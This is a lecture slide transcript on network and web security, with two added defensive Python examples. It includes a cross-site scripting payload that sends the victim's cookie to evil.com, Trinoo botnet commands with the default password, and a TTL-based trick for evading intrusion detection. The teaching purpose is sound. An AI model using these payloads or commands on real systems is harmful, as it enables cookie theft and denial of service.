Network & WebSecurity PowerPoint PPT Presentation
Presentation Transcript

Network & WebSecurity

Dina Katabi

[email protected]

nms.csail.mit.edu/~dina


Denial of Service Attack (DoS)

  • Goal: prevent legitimate access to an Internet service

  • Mechanism: Typically tries to congest the service or bring it down

  • Types: can target any resource, e.g., link bandwidth, routing system, access to database

  • Example: attacker transmits too many packets to congest the access link of the server causing legitimate connections to suffer excessive drops and timeout


BotNets

  • A Botnet is a large collection of compromised machines controlled by an attacker

  • Botnets can be used to mount distributed DoS (DDoS) attacks

  • Machines in a botnet are compromised via Internet worms, viruses, Trojans, etc.

  • One can rent a Botnet of 10K machines for about $200/day


A Botnet is typically organized in hierarchy

[Diagram: Attacker -> three Masters -> ten Daemons -> Victim. The edges are labelled, top to bottom: unidirectional commands (attacker to masters), coordinating communication (masters to daemons), and attack traffic (daemons to victim).]


Specialized software is installed on the compromised machines, e.g., Trinoo

Connection to port (default 27665/tcp):

  attacker$ telnet 10.0.0.1 27665
  Trying 10.0.0.1
  Connected to 10.0.0.1
  Escape character is '^]'.
  Kwijibo
  Connection closed by foreign host.
  . . .
  attacker$ telnet 10.0.0.1 27665
  Trying 10.0.0.1
  Connected to 10.0.0.1
  Escape character is '^]'.
  Betaalmostdone
  trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
  trinoo>


Trin00 Commands

  • dos <IP> - command to initiate a DoS against the targeted <IP> address

  • mdos <IP1:IP2:IP3> - sends command to attack three IP addresses, sequentially

  • die – shut down the master

  • mdie <password> - if the correct password is specified, a packet is sent out to all daemon nodes to shut down

  • mping – ping sent to all nodes in the daemon list

  • killdead – delete daemon nodes from the list that didn’t reply to the ping

  • bcast – gives a list of all active daemons

  • mstop – Attempts to stop an active DoS attack. Never implemented by the author(s), but the command is there


Approaches to Intrusion Detection

  • Signature Based: Keeps a DB of known attack signatures and matches traffic against DB (e.g., Bro, Snort)

    • Pros

      • Easy to understand the outcome

      • More accurate in detecting known attacks

    • Cons

      • Can’t discover new attacks

  • Anomaly Based: Matches traffic against a model of normal traffic and flags abnormalities (e.g., EMERALD)

    • Pros

      • Can deal with new attacks

    • Cons

      • Modeling normal traffic: it is hard to describe what is normal

      • Limits new applications

      • Less accurate detection of known attacks

  • Hybrid: Matches against DB of known attacks. If no match, it checks for anomaly


Evasion Problem in NIDS

  • Consider scanning traffic for a particular string (“USER root”)

  • Easiest: scan for the text in each packet

    • No good: text might be split across multiple packets

  • Okay, remember text from previous packet

    • No good: out-of-order delivery

  • Okay, fully reassemble byte stream

    • Costs state ….

    • …. and still evadable

Source: Vern Paxson


Evading Detection via Ambiguous TCP Retransmission

[Diagram: the attacker (sender) is 20 hops from the receiver; the NIDS sits 15 hops along that path, so it sees every segment, including ones whose TTL expires before they reach the receiver.]

Segments, in the order the NIDS observes them ("timed out" = TTL expired before reaching the receiver):

  TTL=17, seq=1, data "n"  -- timed out
  TTL=23, seq=1, data "r"  -- delivered
  TTL=21, seq=2, data "o"  -- delivered
  TTL=15, seq=2, data "i"  -- timed out
  TTL=20, seq=3, data "o"  -- delivered
  TTL=19, seq=4, data "c"  -- timed out
  TTL=27, seq=4, data "t"  -- delivered

What the NIDS sees at each position: n or r? / i or o? / o / c or t?

Possible reassembled streams: noot? niot? rooc? nooc? nioc? riot? root? …

What the receiver actually assembles from the delivered bytes: root
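The ambiguity above, worked from the defender's side as an added example (not from the original slides): a small reassembler that records inconsistent retransmissions, enumerates every stream the receiver might have assembled (bifurcating analysis) and matches the signature against all of them, and a normalizer-style view that discards segments whose TTL cannot reach the receiver. The segment list, the 20-hop distance, and the function names are constructed from the slide's diagram.

```python
import itertools
from collections import defaultdict

# Constructed from the slide's diagram: (seq, ttl, payload byte) in the order
# the NIDS observed them. The NIDS sits 15 hops from the attacker and the
# receiver 20 hops, so every segment is visible to the NIDS but only those
# with TTL >= 20 survive to the receiver.
SEGMENTS = [(1, 17, "n"), (1, 23, "r"), (2, 21, "o"), (2, 15, "i"),
            (3, 20, "o"), (4, 19, "c"), (4, 27, "t")]
HOPS_TO_RECEIVER = 20  # assumed known to the defender (e.g. measured)

def payloads_by_seq(segments):
    """Distinct payloads seen per sequence number, in order of first sighting."""
    seen = defaultdict(list)
    for seq, _ttl, data in segments:
        if data not in seen[seq]:
            seen[seq].append(data)
    return dict(seen)

def inconsistent_retransmissions(segments):
    """Sequence numbers retransmitted with different content: the slide's
    'n or r?' cases. Each one is worth an alert on its own."""
    return sorted(s for s, p in payloads_by_seq(segments).items() if len(p) > 1)

def candidate_streams(segments):
    """Bifurcating analysis: enumerate every stream the receiver might have
    assembled, one per combination of conflicting payloads (2^k of them)."""
    by_seq = payloads_by_seq(segments)
    choices = [by_seq[s] for s in sorted(by_seq)]
    return ["".join(c) for c in itertools.product(*choices)]

def matching_candidates(segments, signature):
    """Signature match over all candidates instead of over one guessed stream."""
    return [c for c in candidate_streams(segments) if signature in c]

def receiver_view(segments, hops):
    """Normalizer view: drop segments whose TTL expires before the receiver,
    then keep the first surviving payload per seq, which is exactly what the
    receiver itself accepted."""
    stream = {}
    for seq, ttl, data in segments:
        if ttl >= hops:
            stream.setdefault(seq, data)
    return "".join(stream[s] for s in sorted(stream))

if __name__ == "__main__":
    print("ambiguous seqs:", inconsistent_retransmissions(SEGMENTS))
    print("candidates:", candidate_streams(SEGMENTS))
    print("matches 'root':", matching_candidates(SEGMENTS, "root"))
    print("receiver saw:", receiver_view(SEGMENTS, HOPS_TO_RECEIVER))
```

A NIDS that simply kept the first copy of each sequence number would reconstruct "nooc" (the result of `receiver_view(SEGMENTS, 15)`) and miss the signature entirely, which is the evasion the slide illustrates.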


TCP SYN Flood

TCP DoS Attacks:

[Diagram, normal handshake: Client sends SYN_C; Server (Listening) stores connection data and replies SYN_S, ACK_C, then waits; Client sends ACK_S; Connected.]

[Diagram, flood: Client C sends SYN_C1, SYN_C2, SYN_C3, SYN_C4, SYN_C5 to Server S (Listening); S stores data for every one of them.]

TCP SYN Flood

TCP DoS Attacks:

  • Usually targets connection memory: too many half-open connections

  • Potential victim is any TCP-based server such as a Web server, FTP server, or mail server

  • How can the server deal with it?

    • Server times out half-open connection


DoS Attacks on Web Servers

DoS Attacks on Servers: Attacks that Mimic Legitimate Traffic

[Diagram: compromised machines flood the victim with ordinary-looking requests such as "GET LargeFile.zip" and "DO LongDBQuery".]

  • Attacker compromises many machines causing them to flood victim with HTTP requests

  • Attacked resources

    • DB and Disk bandwidth

    • Socket buffers, processes, …

    • Dynamic content, password checking, etc.

  • Hard to detect; attack traffic is indistinguishable from legitimate traffic


CAPTCHA-Based Solution

[Diagram: challenge page reading "Suspected attack! To access www.foo.com enter the above letters:"]

  • Need to ensure:

    • Cheap ways to send the test and check the answer

    • Some people can’t or don’t want to answer graphical tests but are legitimate users (e.g., blind users)


Web Attacks

  • Most web attacks exploit JavaScript

  • JavaScript can appear in a web page as

    • <script> executable instructions </script>

    • The instructions between <script> and </script> do not appear on the web page; they get executed by the browser

    • If the instructions are malicious they can do a lot of harm to the client, e.g., steal web cookies

  • Cross-site scripting is one of the most common attacks on web browsers


Cross-Site Scripting (XSS)

  • Say you have a trusted web server that accepts entries from users,

    • e.g., TrustedBlog.com has a box for users to enter comments on prior blogs

  • Attacker can embed an executable script in his comment like:

    • <script> document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie; </script>

    • When a user browses the trusted server, the server sends the comments and the victim’s browser executes the script, sending the victim’s cookie to the attacker’s site
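The TrustedBlog.com scenario as an added example (not code from the original slides): the vulnerable render that pastes a stored comment into the page verbatim beside the hardened render that HTML-escapes it, using the exact comment payload from the slide. The template, function names and the HttpOnly cookie helper are assumptions added here; the server-side framework of the real site is not described on the page.

```python
import html

# Constructed: the exact comment the slide shows the attacker posting
ATTACKER_COMMENT = ("<script> document.location = "
                    "'http://evil.com/blah.cgi?cookie=' + document.cookie; </script>")

# Assumed page fragment into which the server inserts each stored comment
COMMENT_TEMPLATE = '<div class="comment">{body}</div>'

def render_comment_vulnerable(comment):
    """What TrustedBlog.com does on the slide: the stored text is inserted
    verbatim, so the victim's browser parses and runs the <script>."""
    return COMMENT_TEMPLATE.format(body=comment)

def render_comment_safe(comment):
    """Hardened form: escape the HTML metacharacters (< > & ' ") so the
    comment is displayed as text; the browser never sees a script element."""
    return COMMENT_TEMPLATE.format(body=html.escape(comment, quote=True))

def has_live_script(rendered_html):
    """Check used in the test: is there still a script tag the parser would act on?"""
    return "<script" in rendered_html.lower()

def session_cookie_header(session_id):
    """Added mitigation, not on the slide: HttpOnly keeps the session cookie out
    of document.cookie, so a script that does run cannot read it. Escaping is
    still required; this only limits the damage."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; Path=/"

if __name__ == "__main__":
    print(render_comment_vulnerable(ATTACKER_COMMENT))
    print(render_comment_safe(ATTACKER_COMMENT))
    print(session_cookie_header("EXAMPLE-SESSION-ID"))
```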


  • Login